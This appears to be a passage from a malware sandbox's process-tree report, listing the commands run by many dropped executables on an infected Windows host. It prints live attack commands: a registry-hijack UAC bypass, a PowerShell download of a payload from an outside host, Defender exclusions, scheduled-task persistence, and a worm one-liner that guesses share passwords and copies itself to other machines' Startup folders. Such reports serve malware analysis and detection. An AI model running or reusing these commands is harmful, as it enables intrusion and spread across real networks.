C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:5912
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:5128
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\3082.vbs6⤵PID:3364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:6168
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\3082.vbs4⤵PID:6176
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:6468
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:6548
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:7048
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:6220
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4210.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:7132
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4210.vbs" /f5⤵
- Modifies registry class
PID:7244
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:7312
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:7600
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:7852
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4210.vbs6⤵PID:8188
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:7632
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\4210.vbs4⤵PID:8172
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7312
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:7968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7480
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:5372
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:8500
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:8668
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6651.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:9052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6651.vbs" /f5⤵
- Modifies registry class
PID:9148
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:6976
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:1264
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:8916
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\6651.vbs6⤵PID:5996
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5344
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\6651.vbs4⤵PID:4284
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4752
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:3756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""4⤵
- Command and Scripting Interpreter: PowerShell
PID:5624
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"3⤵
- Executes dropped EXE
PID:9080
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"3⤵
- Executes dropped EXE
PID:5824
-
-
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:408 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd4⤵PID:2060
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7772
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:7780
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:8008
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:1464
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3975065⤵PID:5564
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k5⤵PID:5012
-
-
C:\Users\Admin\AppData\Local\Temp\397506\Mesa.comMesa.com k5⤵
- Suspicious use of SendNotifyMessage
PID:6708
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:6284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\test12.exe"C:\Users\Admin\AppData\Local\Temp\a\test12.exe"3⤵
- Executes dropped EXE
PID:9156
-
-
C:\Users\Admin\AppData\Local\Temp\a\test6.exe"C:\Users\Admin\AppData\Local\Temp\a\test6.exe"3⤵
- Executes dropped EXE
PID:3668
-
-
C:\Users\Admin\AppData\Local\Temp\a\test14.exe"C:\Users\Admin\AppData\Local\Temp\a\test14.exe"3⤵
- Executes dropped EXE
PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"3⤵
- Executes dropped EXE
PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\a\test9.exe"C:\Users\Admin\AppData\Local\Temp\a\test9.exe"3⤵
- Executes dropped EXE
PID:5556
-
-
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"3⤵
- Executes dropped EXE
PID:6908
-
-
C:\Users\Admin\AppData\Local\Temp\a\test19.exe"C:\Users\Admin\AppData\Local\Temp\a\test19.exe"3⤵PID:7080
-
-
C:\Users\Admin\AppData\Local\Temp\a\test10.exe"C:\Users\Admin\AppData\Local\Temp\a\test10.exe"3⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"3⤵PID:7076
-
-
C:\Users\Admin\AppData\Local\Temp\a\test23.exe"C:\Users\Admin\AppData\Local\Temp\a\test23.exe"3⤵PID:7376
-
-
C:\Users\Admin\AppData\Local\Temp\a\test5.exe"C:\Users\Admin\AppData\Local\Temp\a\test5.exe"3⤵PID:7980
-
-
C:\Users\Admin\AppData\Local\Temp\a\test11.exe"C:\Users\Admin\AppData\Local\Temp\a\test11.exe"3⤵PID:8184
-
-
C:\Users\Admin\AppData\Local\Temp\a\test20.exe"C:\Users\Admin\AppData\Local\Temp\a\test20.exe"3⤵PID:7916
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"3⤵PID:7484
-
-
C:\Users\Admin\AppData\Local\Temp\a\test16.exe"C:\Users\Admin\AppData\Local\Temp\a\test16.exe"3⤵PID:7840
-
-
C:\Users\Admin\AppData\Local\Temp\a\test13.exe"C:\Users\Admin\AppData\Local\Temp\a\test13.exe"3⤵PID:8612
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"3⤵PID:8684
-
-
C:\Users\Admin\AppData\Local\Temp\a\test15.exe"C:\Users\Admin\AppData\Local\Temp\a\test15.exe"3⤵PID:8400
-
-
C:\Users\Admin\AppData\Local\Temp\a\test18.exe"C:\Users\Admin\AppData\Local\Temp\a\test18.exe"3⤵PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\a\test21.exe"C:\Users\Admin\AppData\Local\Temp\a\test21.exe"3⤵PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\a\test22.exe"C:\Users\Admin\AppData\Local\Temp\a\test22.exe"3⤵PID:8668
-
-
C:\Users\Admin\AppData\Local\Temp\a\test8.exe"C:\Users\Admin\AppData\Local\Temp\a\test8.exe"3⤵PID:9028
-
-
C:\Users\Admin\AppData\Local\Temp\a\test7.exe"C:\Users\Admin\AppData\Local\Temp\a\test7.exe"3⤵PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"3⤵PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\a\test17.exe"C:\Users\Admin\AppData\Local\Temp\a\test17.exe"3⤵PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"3⤵
- Suspicious use of SetThreadContext
PID:5484 -
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"4⤵PID:1416
-
-
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"4⤵PID:2868
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\win.exe"C:\Users\Admin\AppData\Local\Temp\a\win.exe"3⤵
- Adds Run key to start application
PID:6960 -
C:\Windows\SysWOW64\route.exeroute print4⤵PID:6232
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.127.0.14⤵
- Network Service Discovery
PID:3064
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"3⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3364 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:3088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 10644⤵
- Program crash
PID:3076
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\FaceBuild.exe"C:\Users\Admin\AppData\Local\Temp\a\FaceBuild.exe"3⤵PID:6204
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:7568
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version4⤵PID:7964
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate4⤵PID:8072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:9164
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer4⤵PID:7604
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity4⤵PID:1692
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name4⤵
- Detects videocard installed
PID:7928
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵
- System Location Discovery: System Language Discovery
PID:7780
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵
- System Location Discovery: System Language Discovery
PID:8276
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\InstaIIer.exe"C:\Users\Admin\AppData\Local\Temp\a\InstaIIer.exe"3⤵PID:9172
-
-
C:\Users\Admin\AppData\Local\Temp\a\TikTokDesktop18.exe"C:\Users\Admin\AppData\Local\Temp\a\TikTokDesktop18.exe"3⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:4688 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"3⤵
- Suspicious use of SetThreadContext
PID:8200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:3708
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5585.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6900
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"4⤵PID:7688
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"4⤵PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"4⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3352
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"3⤵
- Suspicious use of SetThreadContext
PID:8304 -
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"4⤵PID:8556
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:8056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd4⤵
- System Location Discovery: System Language Discovery
PID:7404 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5136
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:5588
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:4512
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
PID:5384
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 294425⤵
- System Location Discovery: System Language Discovery
PID:3720
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l5⤵PID:7436
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:768 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com6⤵
- Suspicious use of SetThreadContext
PID:6200 -
C:\Windows\explorer.exeexplorer.exe7⤵PID:5872
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:8852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵PID:3860
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- Kills process with taskkill
PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5288
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:2868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵
- System Location Discovery: System Language Discovery
PID:6464 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- Kills process with taskkill
PID:6452
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ5⤵
- System Location Discovery: System Language Discovery
PID:7920 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵
- Adds Run key to start application
PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:7936
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:8000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:9200
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3356
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0005⤵
- Power Settings
PID:6200 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 06⤵
- Power Settings
PID:400
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 06⤵
- Power Settings
PID:8088
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:8072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1500& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
- NTFS ADS
PID:4976 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:4960 -
C:\Windows\SysWOW64\net.exenet view7⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:4992
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵
- System Location Discovery: System Language Discovery
PID:4864
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:7748
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:2096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "6⤵
- System Location Discovery: System Language Discovery
PID:1224 -
C:\Windows\SysWOW64\net.exenet view \\10.127.255.2557⤵
- Discovers systems in the same network
PID:6088
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:5060
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:2768
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6548
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:6008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:6656 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:7064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:5716 -
